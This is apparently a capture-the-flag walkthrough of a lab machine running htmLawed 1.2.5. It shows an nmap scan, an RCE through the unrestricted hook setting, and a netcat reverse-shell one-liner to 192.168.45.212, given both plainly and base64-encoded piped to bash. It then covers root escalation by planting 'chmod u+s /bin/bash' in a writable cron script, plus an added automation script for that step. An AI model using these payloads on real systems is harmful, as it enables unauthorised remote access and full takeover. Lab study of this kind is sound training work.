root💀n16hth4wk-sec:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.


First enumeration with nmap

# Nmap 7.94SVN scan initiated Tue Feb 20 14:22:09 2024 as: nmap -sC -sV -T4 -oN service.nmap -p 22,80 -Pn 192.168.239.190
Nmap scan report for 192.168.239.190
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: htmLawed (1.2.5) test
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 20 14:22:25 2024 -- 1 IP address (1 host up) scanned in 16.09 seconds

A web server is running on port 80. Opening it in a browser, we can see it is running htmLawed 1.2.5 (the http-title in the nmap output already says so).

After some research, it turns out that the htmLawed test page is vulnerable to RCE: its settings let the request name a PHP function as the "hook" callback that htmLawed runs on the processed text, and the name is not restricted, so a command-executing function can be supplied through those settings.

Intercept the form submission with Burp, edit the request, and forward it.

We triggered RCE. Now let's get a reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.212 80 >/tmp/f

# base64-encoded form of the one-liner (encode it without a trailing newline or line wrapping, so the decoded text is exactly the command above)
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguNDUuMjEyIDgwID4vdG1wL2Y=

echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguNDUuMjEyIDgwID4vdG1wL2Y= | base64 -d|bash

Send the payload through the same request and check the nc listener on 192.168.45.212 port 80.

We got a reverse shell as www-data.

Privilege Escalation

Running pspy on the target, we can see a cron job running a script as root.

Checking the script, it is writable by our user, so we append a command that sets the SUID bit on /bin/bash and wait for the cron job to run it. Listing /bin/bash before and after shows the change (the owner execute slot goes from x to s):

www-data@law:/tmp$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash
www-data@law:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash
www-data@law:/tmp$ ls -al /bin/bash -p 
-rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash
www-data@law:/tmp$ /bin/bash -p 
bash-5.1# whoami 
root
bash-5.1# 

Once /bin/bash is SUID root (the listing shows both the setuid and setgid bits set, -rwsr-sr-x; setuid root is the one that matters), running /bin/bash -p spawns a root shell. The -p flag matters: without it bash resets the effective uid to the real uid and drops the privilege.
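The cron-script trick as an added dry run (this is not code from the original post): it appends the chmod u+s line to a writable script once, so repeated cron firings do not stack copies, polls until the setuid bit appears, and performs the check a practitioner would run before calling /bin/bash -p. Everything happens on copies in a temporary directory, so it needs no root; the script and target paths are placeholders for the box's cron script and /bin/bash, and the function names are mine.

```sh
#!/bin/sh
# Added example, not code from the original post.  Simulates the privesc in a
# temp directory (no root needed): a "cron script" that root would run, a
# stand-in for the target binary, the appended chmod u+s line, and a poll
# loop that waits for the bit to appear.  Names (CRON_SCRIPT, TARGET,
# demo_in_tmpdir) are placeholders of mine.

# The single line to append to the root-run script.  chmod u+s on a
# root-owned binary gives setuid root; u+s alone is enough (the post's
# listing also shows g+s, which is not needed for a root shell).
suid_payload() {           # $1 = binary to make setuid
  printf 'chmod u+s %s\n' "$1"
}

# Append the line once; a second cron run must not stack duplicates.
plant_payload() {          # $1 = writable script run by root, $2 = target
  line=$(suid_payload "$2")
  grep -qxF -- "$line" "$1" 2>/dev/null || printf '%s\n' "$line" >> "$1"
}

# Poll until the setuid bit shows up or the timeout expires.
# $1 = path, $2 = timeout in seconds, $3 = poll interval in seconds
wait_for_suid() {
  elapsed=0
  while [ "$elapsed" -lt "$2" ]; do
    [ -u "$1" ] && return 0
    sleep "$3"
    elapsed=$((elapsed + $3))
  done
  [ -u "$1" ]
}

# End-to-end dry run in a temp dir.  Returns 0 when the bit ends up set.
demo_in_tmpdir() {
  tmp=$(mktemp -d) || return 1
  CRON_SCRIPT="$tmp/root-cron.sh"     # stands in for the writable root cron script
  TARGET="$tmp/fake-bash"             # stands in for /bin/bash
  printf '#!/bin/sh\necho housekeeping\n' > "$CRON_SCRIPT"
  printf '#!/bin/sh\necho fake shell\n' > "$TARGET"
  chmod 755 "$TARGET"
  plant_payload "$CRON_SCRIPT" "$TARGET"
  plant_payload "$CRON_SCRIPT" "$TARGET"   # re-plant: still a single line
  [ "$(grep -c 'chmod u+s' "$CRON_SCRIPT")" -eq 1 ] || { rm -rf "$tmp"; return 1; }
  sh "$CRON_SCRIPT" >/dev/null             # this is what cron does as root
  wait_for_suid "$TARGET" 5 1
  rc=$?
  rm -rf "$tmp"
  return $rc
}

# On the real box the sequence is: plant_payload <cron script> /bin/bash,
# wait_for_suid /bin/bash 300 5, then /bin/bash -p  (-p keeps euid 0; without
# it bash drops the effective uid back to the caller's).
if [ "${1:-}" = demo ]; then demo_in_tmpdir && echo "setuid bit set"; fi
```

Run it with the argument demo to see the dry run; the wait loop is the piece people skip and then wonder why /bin/bash -p gives a www-data shell: the bit is only there after cron has actually fired.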

And we are through 🙂